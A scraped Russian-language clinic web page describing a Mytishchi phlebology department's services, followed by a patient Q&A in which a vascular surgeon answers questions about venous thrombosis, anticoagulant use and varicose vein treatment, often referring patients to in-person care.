Лами гелиос флебо 3 отзывы: Лазерный комплекс для флебологии «Гелиос-Флебо III», Россия › купить, цена в Москве, оптом и в розницу

Содержание

Врач флеболог в Мытищах – Флебология

Услуги

Заболевания

Оборудование

Методы

Главная / Отделения 🏥 / Флебология (Сердечно-сосудистая хирургия)

Центр сердечно-сосудистой хирургии и эндоваскулярной флебологии

Сосудистый хирург и флеболог – специалисты в области диагностики и терапии венозных патологий различного характера. Чаще всего в своей практике они сталкиваются с варикозным расширением вен нижних конечностей и такими осложнениями данного заболевания, как трофические язвы, венозная экзема, отеки ног и посттромботические состояния. Также значительная часть пациентов флебологического отделения обращается по поводу тромбозов поверхностных и глубоких вен. Распространенным явлением в повседневной деятельности сосудистого хирурга остается венозная недостаточность. Данное состояние в той или иной форме отмечается у каждого второго взрослого жителя страны. Большую часть клинических случаев составляют женщины и пожилые люди.

Лечение патологий вен зависит от типа и стадии развития заболевания. Для борьбы с венозными нарушениями могут применяться консервативные методы, малоинвазивные процедуры и хирургические вмешательства.

Показания для консультации врача-флеболога:

  • образование сосудистых «звездочек», сеток
  • визуально определяемое варикозное расширение вен («узлы», «гроздья»)
  • появление коричневых пятен с внутренней стороны лодыжки
  • дискомфортные, болевые ощущения, чувство тяжести в ногах
  • отечность стоп и голеней, проявляющаяся к концу дня
  • судороги икроножных мышц в ночное время
  • трофические язвы в области лодыжек

Регулярное посещение сердечно-сосудистого хирурга для контроля состояния венозной системы необходимо людям, имеющим генетическую склонность к патологиям сосудов.

Также в группе риска находятся курильщики и лица, регулярно употребляющие спиртные напитки.

Методы лечения в отделении флебологии центра «Медикал Он Груп – Мытищи»

Терапевтическая схема разрабатывается индивидуально в каждом клиническом случае. Для этого пациент проходит комплексное обследование с применением современного медицинского оборудования. Для подробной оценки состояния венозного русла флеболог нашей клиники назначает полное исследование системы гемостаза, дуплексное ангиосканирование, 3D и 4D УЗ-диагностику.

После постановки диагноза лечение венозных патологий проводится наиболее эффективным и безболезненным способом. На ранних этапах варикозных и других нарушений можно достичь выраженного результата с помощью консервативных методов:

  • приема медикаментов
  • местного нанесения мазей для наружного применения
  • ношения компрессионного бель
  • коррекции образа жизни и рациона питания
  • отказа от вредных привычек
  • контрастных душей
  • других профилактических мероприятий

В запущенных случаях необходима помощь врача-сосудистого хирурга, который проведет малоинвазивное хирургическое вмешательство. Большинство венозных патологий успешно устраняются посредством лазерных процедур. Высокотехнологичное оборудование позволяет обойтись без разрезов и длительной реабилитации. В большинстве случаев специалисты флебологического отделения центра «Медикал Он Груп – Мытищи» успешно удаляют варикоз всего за одну процедуру.


Преимущества лечения в Медикал Он Груп

Высокий уровень технологий

В нашей клинике многие венозные патологии устраняются без сложных операций и длительного восстановительного периода. Это возможно благодаря применению прогрессивных методик и передового медицинского оснащения.

Авторитетные доктора

На прием к нашему флебологу записываются также пациенты из Королева и других городов. Они проходят обследование у опытного специалиста, который подробно оценивает состояние сосудов и подбирает оптимальный план терапии.

Лечение за 1 процедуру

Сосудистые хирурги «Медикал Он Груп – Мытищи» устраняют многие венозные патологии за одно посещение. Терапия проводится в амбулаторных условиях и не требует сложной реабилитации.

В нашей клинике многие венозные патологии устраняются без сложных операций и длительного восстановительного периода. Это возможно благодаря применению прогрессивных методик и передового медицинского оснащения.

На прием к нашему флебологу записываются также пациенты из Королева и других городов. Они проходят обследование у опытного специалиста, который подробно оценивает состояние сосудов и подбирает оптимальный план терапии.

Сосудистые хирурги «Медикал Он Груп – Мытищи» устраняют многие венозные патологии за одно посещение. Терапия проводится в амбулаторных условиях и не требует сложной реабилитации.

Цены на услуги флеболога

Прием (осмотр, консультация) врача — сердечно-сосудистого хирурга первичный

1500

  • Сбор жалоб и анамнеза
  • Общий визуальный осмотр специалистом
  • Постановка диагноза / предварительного диагноза
  • Рекомендации по тактике дальнейшего лечения (при отсутствии противопоказаний) и необходимости дальнейшего дообследования/наблюдения
  • Постановка предварительного диагноза
  • Назначение лабораторных и инструментальных методов обследований (для уточнения диагноза)

Показать полностью

Евгений Илюхин — Вопрос-ответ

Задать вопрос

Здравствуйте. Мне 33. У меня обнаружен тромб воротной и селезеночной вены, инфаркт печени. Пилефлебит. Принимаю Прадакса 110мг. омепразол и мезим. Последнее время начали сильно болеть ноги, икры, для облегчения ношу компрессионные чулки. С чем это может быть связана боль в ногах?

Понятия не имею. Я не ставлю диагнозы заочно.

Ответить

Здравствуйте. Мне 47 лет. Женщина. Полгода назад получила тромбоз внутренней и внешней вены на левой ноге, также ТЭЛА в сегменте лёгкого. Ксарелто 20 мг пропила полгода. Сейчас вены и лёгкие чистые, без тромбов. Как лучше закончить принимать ксарелто: сразу или уменьшая дозу? Заранее спасибо за ответ.

Никакие антикоагулянты не отменяются «уменьшением дозы». Просто перестать принимать, когда закончился рекомендованный срок.

Ответить

Девушка 33 года, два года назад перенесла тромбоз левой нижней конечности, осталась оклюзия ( признаки оклюзивного тромбоза левой внешней клубной вены с реканализацией 25%), полтора года не принимаю разжижающие препараты (пила Ксарелто 20 мг), сегодня выявили ковид, семейный доктор назначенил Ксарелто 10 мг на 10 дней, а лечащий хирург 20 мг на месяц! Скажите пожалуйста своё мнение по поводу дозировки Ксарелто?! И есть ли опасность для жизни, если появится кашель(я оклюзию имею ввиду)?!

При тромбозе в прошлом при любой тяжести ковида (даже при легком) требуется тромбопрофилактика, при выборе для профилактики Ксарелто рекомендуется дозировка 10 мг в сутки, длительность приема — до 30 суток.

В Вашем случае, учитывая перенесенный тромбоз, я бы не ограничивался 10 сутками. Остальные вопросы мне непонятны. Остатки того тромбоза, что у Вас был никакой опасности ни в какой ситуации не представляют. Кашляйте на здоровье. Опасность только одна — в возникновении новых тромбов, для защиты от этого и назначаются антикоагулянты.

И на будущее — будьте повнимательнее в описании. Никаких внешних клубных вен не существует. Я ориентировался на факт того, что был какой-то тромбоз вен нижней конечности, этого факта достаточно для определения тактики защиты при ковиде.

Спасибо большое, Евгений Аркадьевич за ответ! Сейчас я начала пить Ксарелто 20 мг на 30 дней (пью уже 2 день) как настаивал хирург который вёл мой тромбоз, так как он говорит, что 10 мг мне будет «мало»! Скажите пожалуйста, своё мнение это не опасно начинать с 20 мг?!

Есть стандарты, проверенные в специальных исследованиях. Личные фантазии отдельных специалистов на тему «много» или «мало» эффективность защиты не повысят.  

Ответить

Здравствуйте, доктор! Женщина, 60 лет, малоподвижная по основному заболеванию ЦНС, После госпитализации в ходе обследования обнаружен тромбоз 3 глубоких вен левой конечности, кроме подкожных. Осмотр ангиохирурга: показаний для установки кава-фильтра нет. Назначен апексабан 10х2 р на 7 дней, 5х2р на 3 месяца, компрессия 3. Скажите, пожалуйста, как быстро обычно растворяются тромбы? И как они могут растворится, если вена полностью перекрыта тромботическими массами, как же туда попадет лекарство? Спасибо.

Лекарства (антикоагулянты) не растворяют тромбы, они не дают образоваться новым. В вену с тромбом им поподать нет необходимости. Тромб рассасывает организм, но это чаще всего не очень важно. Важна защита от тромбоэмболии новыми свежими тромбами, в этом смысл лекарств.

Ответить

Добрый день, маме 58 лет, в анамнезе – варикозное расширение вен (внешне выглядит ужасно) еще с детского возраста. На левой ноге проведена флебэктомия 2 года назад. Ранее тромбов не диагностировали. Год назад перенесла ковид, лечение амбулаторно, с последующим повышением показателей свертываемости, несколько месяцев терапия Эликвикс, после нормализации показателей – Кардиомагнил постоянно по рекомендации терапевта. Неделю назад госпитализирована в стационар с кровотечением – язва 12перстной кишки. Вероятно, на фоне лечения гемостатиками и постельного режима диагностирован тромбофлебит поверхностных вен, тромб на правой ноге, с внутренней стороны голени, по центру. Назначено консервативное лечение (гепариновая мазь местно, холод, компрессионный трикотаж), отменены все препараты кроме ОМЕЗ. Тромб значительно уменьшился в размерах за пару дней и по мнению сосудистого хирурга пациентку можно выписывать на амбулаторное лечение, при том, что антикоагулянты под запретом из-за риска повторного кровотечения (язвы). Как оценить опасность этого тромба для жизни? Можно ли выписывать такую пациентку из стационара на амбулаторное лечение? Есть ли рекомендованные препараты для таких случаев? Спасибо.

Поверхностный тромбоз редко опасен и обычно лечится без антикоагулянтов. Возможность выписки решается очно, но поверхностные тромбозы почти всегда лечатся амбулаторно. Возможность выписки скорее определяется риском повтора кровотечения. Нужно ли что-то принимать дальше решается очно. Я оснований что-то назначать в представленном описании не вижу.

Ответить

Здравствуйте. В середине мая после ковида обнаружили тромбоз, принимаю ксарелто 20. По результатам последнего обследования тромбоз рассосался, остались пристеночные утолщения. Пора ли прекращать прием ксарелто и как это правильно сделать? Пить сперва 15, а потом 10? Сколько по времени? Продолжать ли носить компрессионный гольф?

Оригинально. Что за тромбоз, где тромбоз, у кого тромбоз (ни возраста, ни состояния здоровья и т.п.) — ноль информации, а решать нужно вопросы по серьезной проблеме и серьезным препаратам. Заочных ответов на такие вопросы по такой информации ни один ответственный специалист не даст. Идите к врачу очно. 

Ответить

Здравствуйте! У меня никогда не было проблем с венами и тромбозами, но недавно переболела ковидом средней тяжести (без пневмонии). Врач на словах сказал, что выпишет Эликвиз на месяц для профилактики тромбоза, но в выписке никаких препаратов не назначил. Анализы, вроде как, в норме все были. Но я принимаю оральные контрацептивы по показаниям, они сгущают кровь. Как вы считаете, нужно ли принимать Эликвис 2.5 мг для профилактики после ковида?

По действующим рекомендациям минздрава после болезни антикоагулянты могут назначаться на срок до 1 мес лицам с высоким риском тромбозов, а именно:

•> 60 лет

•Лечение в ОРИТ

•Активный рак

•Был венозный тромбоз в прошлом

•Серьезное ограничение подвижности (паралич и т.п.)

•Д-димеры выше референса («нормы») >2 раза

Ответить

Добрый день,доктор! Перенесла Ковид в лёгкой форме. Принимала сулодексид Через неделю сданы анализы, все практически в норме, только Нgb 155 и ДДимер 560. Через 2 недели повтор анализов, гемоглобин также высок, лимфоциты повышены61 ( норма до 43), нейтрофилы низкие 29( норма с 47)АST повышена 41(при норме до 36),gamaGT низкая10 (при норме с 12). Протромбин Quick 96.8 Fibrinogen низкий 1.6 /(норма с 2) Д димер 724 ( норма до 200) Мне 56 лет. На постоянной основе прием Кардиомагнил а и мертинила.Жалоб нет. Варикоз.Вес в норме. Подскажите, пожалуйста.куда бежать,что проверить

Извините, я не занимаюсь расшифровкой анализов, которые кем-то назначены. Анализы «привязаны» к конкретному человеку и конкретной ситуации, трактовать их должен тот, кто назначил.

Ответить

Здравствуйте. При тромбозе глубоких вен в ноге, можно ли делать лазерную эпиляцию? И как вам препарат ликсиана 60? Назначили на 3 месяца и компрессия 2 кл.

Можно.

Касательно Эдоксабана (Ликсиана) — все препараты группы прямых оральных антикоагулянтов в общем и целом равны. Различия есть в особых клинических ситуациях.

Ответить

Здравствуйте. Принимаю лечение с ксарелто, началась элергия, кожанный зуд. Что нужно делать? Если заменить препарат то на какой? Спасибо.

Вопрос не для заочных советов. Как минимум нужно определить, на что кожная реакция. Для Ксарелто это большая редкость.

Ответить

Здравствуйте, скажите пожалуйста, 7 лет назад был тгв голени. Ношу на постоянной основе компрессионой гольф 3 класса компрессии. Так получилось, что летом иногда ходил без чулка и появилось чувство распиврния. Сделал узи. Сказали все нормально. Сейчас предстоит перелет на самолёте, это первый полет после тгв. Нужно ли мне выпить эликвис или ксарелто? Укол клексана или чего либо на подобии поставить не могу. Тромбофилию по обследованиям не нашли. Но все равно опасаюсь за перелет. Спасибо

В новых Российских рекомендациях по венозным тромбозам (на рассмотрении в минздраве) прописана современная позиция по этому вопросу: 

  • У пациентов с высоким риском ВТЭО во время авиаперелета рекомендуется рассмотреть возможность применения низкомолекулярных гепаринов только после индивидуальной оценки пользы-риска[730,731].  

УДД 3 УРР В

Комментарий: эноксапарин натрия** из расчета дозы 1 мг\кг массы тела за 2-4 часа до полета может уменьшить вероятность развития ВТЭО. Применение ПОАК с целью профилактики вероятнее всего будет обоснованным, учитывая их фармакокинетические и фармакодинамические свойства, тем не менее исследований, посвящённых этому изучению вопроса, в настоящее время нет

 

Касательно Вашего случая — вряд ли Вы относитесь к группе высокого риска ВТЭО, но решить это должен врач очно.

Ответить

Добрый день! После отмены двугодичного приёма ксарелто (был тромбоз глубокой вены ноги, ТЭЛА) через 3 недели в результате сильнейшего запора случился острый венозный периональный тромбоз (локальный) гемороидального узла. Стоит ли волноваться по данному вопросу. В остальном самочувствие хорошее, признаков острого тромбоза ног врач УЗИ не увидел.

Тромбоз геморроидального узла к сосудистым тромбозам как таковым не относится. По сути это проявление «обострения» геморроя.

Ответить

Здравствуйте Доктор! Подскажите пожалуйста, сдавала расширенную коагулограмму не на тощак и при месячных. Все показатели в норме, кроме Д димера( 400 ). Стоит ли беспокоится или нужно пересдать после завершения КД. Предстоит перелёт часовой два раза. Как можно себя обезопасить перед полетом?

Я не комментирую анализы. Повышение Д-димеров само по себе ничего не значит. Назначаться такой анализ должен с совершенно определенной целью, а не для проверки «склонности к тромбозам».

Ответить

Добрый день! Не подскажете, был тромбоз глубоких вен нижних конечностей (слева) после кесарева и кровопотери 5,5 лет назад. Хожу без компрессии, дома иногда ношу гольф 3 класса Меди. Беспокоит разница в объёме со здоровой ногой в области икры + 1,7-2 см. и в области бедра . МОжно ли применить технику бандажирования конечности с помощью бинтом Лаума малой растяжимости и сутки ходить и спать в бинте? А потом одеть гольф 3 класса для закрепления результата? При этом пить что-то нужно для циркуляции крови? УЗИ делала месяц назад, д-димер в норме. …. Спасибо!

Сомнительно, что эту разницу можно убрать. С точки зрения прогноза для состояния ноги увеличение в окружности на бедре и в верхней трети голени значения не имеет, главное — чтобы не было хронического отека в нижней трети голени. Я бы делал акцент на разнице в окружности в самом узком месте голеней — на щиколотках.

Ответить

Два эпизода ТЭЛА после ковида — в августе 2021 (слева) и рецидив 14.02. 22 справа. Первый раз после 3—х месяцев клексана 0.8 в сутки проба перехода на ксарелто —через 2 недели маточное кровотечение, отмена ксарелто, возврат на клексан ещё на 3 месяца. После чего был назначен Вессель—дуэ, на фоне приема которого рецидив ТЭЛА. И опять 6 месяцев клексан. Сейчас нужно переходить на эликвис— как это правильно сделать и какая дозировка? Пациентке 37 лет.

Здравствуйте. Необходимость в конкретном препарате, его дозировку и длительность приема определяет врач очно. Схемы перехода с одних антикоагулянтов на другие подробно прописаны в инструкции к препаратам и должны соблюдаться без какого-то творчества.

Ответить

Здравствуйте,подскажите пожалуйста у меня ТЭЛА от 01.04.2022 и ТГВ нижних конечностей.на данный момент пью ксарелто .Преобрела кучу других болячек .Психотерапевт назначил антидепрессанты можно их пить при сочетании с ксарелто?

В проверке совместимости препаратов нет никаких секретов — есть справочные сайты, например, Drug Interactions Checker — For Drugs, Food & Alcohol

Можно ввести названия конкретных препаратов и проверить. Проверять нужно не антидепрессанты в целом, а конкретный препарат. Если системы выдает предупреждение о возможном взаимодействии — это не запрет, в этом случае нужно говорить с врачом, который назначил препарат.

Ответить

Добрый день. В апреле 2021 г. был тромбоз подключичной вены правой верхней конечности на фоне полного здоровья (однако в январе болела ковидом). По истечении 2х месяцев полная реканализация, рука не беспокоит. Ксарелто принимала в течение 5 мес. В начале июля текущего года появились странные ощущения в области голени левой ноги ( микросудороги, затем начались боли на сгибе сзади). Терапевт для перестраховки назначила анализ на д- димер и узи вен. Д-димер не превышал референсных значений, однако на узи выявили тромбоз берцового сегмента (тромбирована муравьиная вена в латеральной головке икроножной мышце, в проекции с/3, в/3 голени). Нога при этом не отекала, не краснела. Назначили курс Ксарелто. Через 2 недели на узи никаких фрагментов тромба не видели ( обследования выполнялись 3 раза другими специалистами). Стоит ли в этом случае продолжать приём Ксарелто? Если нет — как правильно отменить препарат? ( принимала по 15 мг 2 раза в день , в течение 8 суток, затем по 20 мг раз в сутки)

Здравствуйте. 

Формально, если выявлен тромбоз глубоких вен (а мышечная (я так трактовал «муравьиная» в Вашем сообщении) вена относится к глубоким), то минимальный срок антикоагуляции — 3 мес., режим стандартный (как Вы и принимаете).

Неформально — при тромбозе только мышечных вен возможно сокращение сроков, однако у Вас предполагается второй эпизод венозного тромбоза, так что я бы не стал этого делать.

Проблема в Вашей ситуации, на мой взгляд — а был ли действительно тромбоз. В отношении мышечных вен нередкая ситуация — гипердиагностика. Отрицательный Д-димер достаточно надежно исключает острый тромбоз, и это противоречит факту его нахождения на УЗИ. С другой стороны, то, что тромб не видели через 2 недели, не говорит ни о чем. Он мог за это время лизироваться (рассосаться) бесследно. Если «вернуться во времени» — я бы первые дни этой истории перепроверял результат первого УЗИ.

В целом, неправильно пролечить повтор тромбоза хуже, чем «зря» пропить антикоагулянты. Я, скорее всего, в этой ситуации склонился бы к проведению полноценного курса натикоагуляции 3 мес.

Спасибо большое за Ваш ответ! Суральная вена ( не муравьиная)))

Добрый день. У меня варикоз на 2 ногах. Мне 40 лет. В марте был тромбоз малой подкожной вены. Врачи считают, что спровоцировал длительный приём Кок по медицинским показаниям. Варикоз надо удалять. У меня нашли мутацию Лейдена в гетерозиготе. Протеин s 54,8, гомоцистеин 9,4. Остальное в норме. АФС исключили. Принимаю ксарелто 20. Прочитала в сети информацию, что удаление варикоза ( лазером в том числе) может вызвать ТГВ и даже ТЭЛА. Теперь у меня панический страх операции. Был ли у вас удачный опыт удаления варикоза с тромбофилией?

Должен заметить, что при тромбозе поверхностных вен (малая подкожная) доза ксарелто — 10 мг, а срок антикоагуляции обычно не должен превышать 6 недель.

Любая, абсолютно любая операция может вызвать осложнения, из которых одно из самых грозных — тромбоз глубоких вен и тромбоэмболия. Риск операции зависит от самой операции (например, при удалении папилломы риск ТГВ и ТЭЛА практически нулевой, а при замене крупного сустава он уже достаточно существенный), а также от состояния здоровья самого пациента.

Удаление варикоза любым путем относится к вмешательствам низкого риска ТГВ и ТЭЛА, и лазер — один из самых безопасных методов. 

Но самое главное, оперирующий хирург до любой операции должен провести оценку риска ТГВ и ТЭЛА по специальной балльной шкале (шкала Каприни) и, если требуется — провести защиту пациента от этих осложнений (обычно назначаются антикоагулянты типа ксарелто или гепарины на несколько дней). И полиморфизм Лейдена учитывается в этой шкале.

Вам такая защита безусловно показана, и она позволяет устранить варикоз безопасно. Все это не опаснее стоматологии.

Личный опыт оперирования пациентов с тромбофилиями — конечно был, в этом нет ничего из ряда вон выходящего, такие ситуации встречаются регулярно.

Добрый утро, у меня трамбом появился после переливания крови в 16 лет, и я принимал ксарелта по 20 мг, 7 месяцев, а патом перешло на 10 мг, и пять дней по принял, и дальше не смог так как закончились, что будет если не принять 2 дня

Ярослав, не пишите в чужих вопросах. Рекомендуемый минимальный срок приема антикоагулянтов — 3 месяца. Может ничего не будет, а может тромбоз повторится. Смысл приема антикоагулянта — максимально снизить риск повтора тромбоза.

Ответить

Здравствуйте! После углубленной диспансеризации Д. Димер 487.Были перебои в работе сердца, на УЗИ поставили незначительный гидроперикард. Рекомендовали лечь на госпитализацию. При поступлении д. Димер 867(норма до 250).Кололи гепарин. Снизили д. димер до 387 и выписали. Рекомендовали пить Эликвис 2.5 мг 2 раза в день и контроль анализа. Через месяц д. Димер 678,еще через 1.5 месяца 746.гемоглобин 159.У меня диабет 2 типа, колю инсулины, сахара очень высокие. Гипотериоз. Что делать? Пить дальше коагулянты или бросить? Врач посоветовал увеличить дозу эликвис а до 5 мг 2 раза в день. Голову заморочили с д. Димер ом. Никто из врачей толком не знает что это такое.Читала в аннотации Эликвис что его нельзя бросать резко. Как быть?

Ваши вопросы вне моей компетенции, я занимаюсь заболеваниями вен. Сам по себе уровень Д-димеров не является показанием к антикоагуляции, он имеет вспомогательное значение при общей оценке показаний. Никакие антикоагулянты не требуют «постепенной» отмены, у них нет феномена «рикошета» на свертываемость.

Ответить

Здравствуйте неделю назад поставили диагноз флеботромбоз глубоких вен нижних конечностей, но почему то болит только слева внизу живота, на узи сказали там тромбы забиты. Третья беременность на сроке 10-11 недель. До этого 2 родов были идеальными без всяких варикозов и прочего. Сейчас ставят клексан 2 р в день, и капают хлорид натрия. Врачи ничего не объясняют не говорят. Как лучше прерывать беременность или это опасно? И вообще это теперь на всю жизнь, или тромбы рассасываются и болезнь уходит? Вообще ничего не понятно. Что ходила к платному доктору ничего не говорят, что в больнице.

Если тромбоированы вены на уровне таза (подвздошные), то может болеть живот. Тромбоз глубоких вен конечностей и таза сам по себе не является показанием к прерыванию беременности. Риски, естественно, есть, но они есть вне зависимости от беременности. Задача врачей — максимально снизить эти риски, для этого назначают антикоагулянты (клексан). Последствия тромбоза разные — у кого-то развивается венозная недостаточность конечности и это сильно осложняет жизнь, а у кого-то практически никаких последствий, даже если тромбы не рассасываются. Чем тщательнее леечение — тем лучше результаты. Для профилактики венозной недостаточности нужна компрессионная терапия.

Ответить

Добрый день, моя мама второй год принимает ксарелто 10 мг после перенесенного ТЭЛА. Вчера утром по каким то рричинам не пропустила прием таблетки, сегодня утром выпила, а в обед появилась макрогематурия, без сгустков и какой либо клиники. Жалоб нет. Как поступить дальше? Пропустить? Спасибо

Прекратить прием ксарелто и вызвать скорую для госпитализации и обследованию по поводу кровотечения.

Спасибо

Здравствуйте, подскажите пожалуйста! У моей бабушки обнаружили тромб в ноге и назначили лекарства эликвис. После второй таблетки началась сильная боль в паху и не может шевелить ногой. Подскажите это опасно? Что это такое ?

Понятия не имею. Я не ставлю диагнозы заочно. Сильная боль — обращаться к врачу очно и разбираться.

Ответить

Здравствуйте!!! Подскажите, пожалуйста, как быть, можно ли ждать? Мама(64г)прошла 6 химий, на пэт кт обнаружили дефект наполнения нижней полой вены, протяжённостью 74*11мм,на кт подтвердили тромб, но результаты полные только через 3 дня, а запись к сосудистому хирургу через месяц. Можно ли столько времени ждать? Не зная характер тромба. Может ксалерто начать, если его можно?

Антикоагулянты может назначить только врач очно. «Дефект наполнения» вряд ли можно расценивать как острый тромбоз. Если очно острый тромбоз исключат — можно при необходимости продолжать химиотерапию с фоновой защитой антикоагулянтами.

Ответить

Добрый день. Помогите пожалуйста разобраться. В марте случился тромбоз малой подкожной вены. Принимаю ксарелто 20. Была на нескольких приемах, мне рекомендовали удалить варикоз и забыть о проблеме. Тромбоз был спровоцирован приемом кок. У меня 2 беременности и 2 родов без проблем. Врачи не рекомендовали сдавать на тромбофилии. Я сдала. Выявили Лейдена в гетерозиготе и протеин s 54,8 ( норма лаборатории 56,1). Гемостазиолог сказал, что дифецит ставят при ниже 40 , значимый только Лейдена и надо пропить полгода Ксарелто и затем только в моменты риска. Я решила делать операцию по удалению вен в первой Градской в Москве. По УЗИ выявили, что затромбованная Вена без варикоза, реканализация хорошая. Варикоз на 2 ногах в больших подкожных венах, Ксарелто и компрессию назначили пожизненно… Самое неприятное , то что мне кажется, что тромбоз в этой части ноги был уже давно. Там был жгутик, который я считала жилкой. Когда заболела Вена я пошла на УЗИ и там нашли тромбоз. Позже болезненный участок немного покраснел, но быстро прошёл. Жгутик после лечения пропал, поэтому я думаю, что это была Вена с тромбами, которую я не замечала несколько лет. Когда пошла к заведующему записаться на операцию, он мне сказал , что у меня не критичный варикоз и удалять его не надо. Действительно ли мне показано пожизненно принимать ксарелто и носить компрессию? Все глубокие Вены проходимы и клапаны работают нормально.

Ситуация не совсем типичная, поэтому заочно я дать предметные рекомендации не смогу. Наличие полиморфизма Лейден и/или тромбоз неварикозной вены не являются показанием к бессрочному (пожизненному) приему антикоагулянтов. 

Добрый день. Прошла ещё одно УЗИ у врача флеболога. По результату мне сказали, что малая подкожная вена затромбовалась из-за сильно расширенной вены джиакомини. Она с рефлексом и сильно расширенна. По ней из варикозной большой вены идёт сброс в малую. Это и послужило дополнительным фактором тромбоза. Такое возможно?

Я не понимаю суть вопроса. Если сама МПВ «неварикозная», то ее тромбоз — явление не совсем стандартное. Но на длительность антикоагуляции это не влияет. 

Ответить

Здравствуйте. У меня тромбофлебит руки после катетера. Тромб был флотирующий, стали лечить клексанами. Сперва 10 дней 0,6 2 раза, детралекс, кардио аспирин 300. Потом перешли на ривароксабан 20, начали появляться шишки, обратно перешли на клексан 0,6 1 раз, но шишки на руке не рассасывались, и сейчас мне увеличили дозу клексан 0,6 2 раза в день, компрессионный рукав , тромбопол 75 один раз, лиотон и феброфид. Через 2 дня перехожу на ксарелто 15 мг 2 раза в день, но врач оставил тромбопол 75. У меня наследственная тромбофилия V Лейдена. Подскажите пожалуйста правильно ли я лечусь? Когда шишки должны рассосаться? И как долго мне принимать ксарелто? Модно ли принимать ксарелто с тромбополом?И нужно ли сдавать анализы и какие, чтобы не было рисков кровотечений? И можно ли лететь на самолёте?

Лечение тромбозов поверхностных вен на руках, в том числе постинъекционных, прописано в рекомендациях Ассоциации флебологов России, утвержденных минздравом. Аспирин для лечения не нужен и не рекомендуется, тем более его сочетание с антикоагулянтами. Если требуются антикоагулянты, то используют или НМГ, или ривароксабан (ксарелто) в дозе 10 мг в сутки. Наличие «шишек» не является показанием к антикоагуляции. Шишки могут рассасываться очень долго и значения для здоровья не имеют. 

Ответить

Здравствуйте, год назад перенесла тгв, спустя 3 месяца тромб полностью рассосался, принимаю тромбо асс по рекомендации хирурга, чулок 2 компрессия. Разница в объёме в икре1,5-2см. Можно ли вести активный образ жизни? Велосипед, плавание в речке, и тд. Боюсь загорать.боли в ноге нет, присутствует усталость и покалывание после нагрузок.

В целом — можно. По состоянию ноги — важнее окружность не в «икре», а в нижней самой узкой части голени. Если там есть разница больше +0,5 см — я бы подумал о коррекции компрессионной терапии. Аспирин не рекомендуется для продленной тромбопрофилактики.

Ответить

Здравствуйте! Нужен ваш совет. Был тромбофлебит поверхностных вен голени левой ноги. (10 лет назад был тромбоз глубоких вен правой ноги). Вены на голени расширены и выпирают вдоль голени по периметру. На узи показывает что большая вена в верху расширена — 10мм. УЗИ показывает что тромбы рассосались. Был на консультации у двух врачей.Один врач предлагает удалить вену лазером, второй открытым методом. Второй врач говорит, что учитывая что у Вас был тромбофлебит, то лучше лазером не удалять. Подскажите, пожалуйста, какой метод выбрать?

Лазер почти всегда наилучший способ устранить источник варикоза. В рекомендациях Ассоциации флебологов, утвержденных минздравом в прошлом году, лазер рекомендуется как метод, предпочтительный в сравнении с «открытой» операцией. После тромбофлебита лазер безусловно менее травматичен чем открытая операция, и не менее надежен.

Ответить

Здравствуйте Евгений Аркадьевич! Повышен д-димер до 2900(норма до 1700), соэ 89, растёт с кадым разом, 38 неделя берем-ти. Болят вены в паху,ноги,тяжело ходить. По гинекологии говорят во время беременности это норма и ничего не предпринимают. Сразу после 1ой берем-ти был тромбоз (случайно на кт нашли, лечили), тогда принимала гормоны. Как быть? Антикоагулянты стоит колоть? Заранее благодарна за ответ.

Такие вопросы не обсуждаются заочно, без всей необходимой медицинской информации. По идее, если в прошлом был подтвержденный венозный тромбоз, Вы должны получать гепарины всю беременность и 6 недель послеродового периода.

Ответить

Здравствуйте, скажите пожалуйста. Четыре года назад была беременна и всю беременность по показаниям гинеколога колола клексан в живот. Сейчас для себя решила проверить Д Димер, результат 0.95. при норме 0.55 Скажите пожалуйста что мне нужно принимать что бы его снизить?

Ненужные анализы ведут к ненужным действиям. 

Ответить

Здравствуйте!В 2020 году был тромбоз глубоких вен правой конечности(ноги),поставили диагноз тромбофлебит. Сейчас пью кардиомагнил,1 мая делал узи-полная реканализация по выписке(а по словам узиста в нижней части ноги еще есть остатки тромба).Дня 3-4 назад начала болеть нога выше колена(в районе бедра)(тянущая неприятная,но не сильная боль,нога не отекает).Нужно ли беспокоиться,обращаться к врачам и делать узи,может быть это связано с тромбами?

Может быть связано, а может быть не связано. Любой человек сам для себя решает, в какой ситуации для него достаточно оснований обратиться к врачу, а в какой — недостаточно. 

Боль в бедре без отека не очень характерный для тромбоза симптом.

Аспирин не рекомендуется для продленной защиты от тромбоза после эпизода тромбоза глубоких вен.

После одного эпизода тромбоза вряд ли нужна тромбопрофилактика больше года, особенно при хорошей реканализации.

Спасибо!Нога всегда после тромбоза болит в разных местах(практически не бывает спокойствия),теперь всегда есть какие то опасения что с ногой что то не так…Хожу в гольфе и нога синеет,врач говорит это нормально. ..А был недавно у сосудистого хирурга,он прописал пить тромбоасс постоянно и детралекс(по три месяца через три месяца).И вот сейчас болит в бедре без отека и это меня беспокоит,можно ли ходить или лучше лежать сейчас.Помню начало своего тромбоза что начинало также болеть но тогда нога опухла на второй день и ходить уже больно было

Раз есть сомнения и вопросы — обратитесь для оценки состояния вен очно.

Ответить

Добрый день Евгений Аркадьевич! Разрешите сегодня присоединиться к поздравлениям, всего Вам самого наилучшего, а самое главное здоровья! Хотелось бы услышать от Вас мнение, можно ли с тромбофлебитом латеральных вен загарать на солнце, после острого периода прошло более двух месяцев, заранее спасибо за ответ

Спасибо, за поздравление. По вопросу: можно, но напомню, что «загорание» повышает риск развития рака кожи.

Ответить

Добрый день! Подскажите, пожалуйста, если после кесарева был тромбоз глубоких вен нижних конечностей, левая. И варикоз я думаю в будущем неизбежен. То оперировать можно будет, если в анамнезе был ТГВ? И правда, что если тромбоз будет повторно, то уже совсем не будет оттока крови? Спасибо!

Тромбоз не обязательно приводит к развитию варикоз, скорее наоборот — довольно редко приводит. Что будет можно и нужно делать — гадать бессмысленно, зависит от особенностей случая. Повторный тромбоз может быть «маленький», без особых последствий, а может быть «большой» сильно ухудшающей состояние ноги, или может привести к тромбоэмболии легочных артерий. Повтор тромбоза — опасное событие, и риск его развития нужно сводить к минимуму.

Добрый день, Евгений Аркадьевич! Спасибо за ответ! А если пропила уже год курс антикоагулянтов и вот уже 4 года без них, то каким образом проводить профилактику рецидива ТГВ ? Учитвая, что тромбоз возник после кесарева (было кровотечение , во время беременности не принимала никакие антикоагулянты ещё, а наоборот, давали гормоны (дюфастон)) Можно ли относить ТГВ к особой категории и не делать в дальнейшем спустя столько лет снова профилактику антикоагулнятами? Или она нужна раз в год?

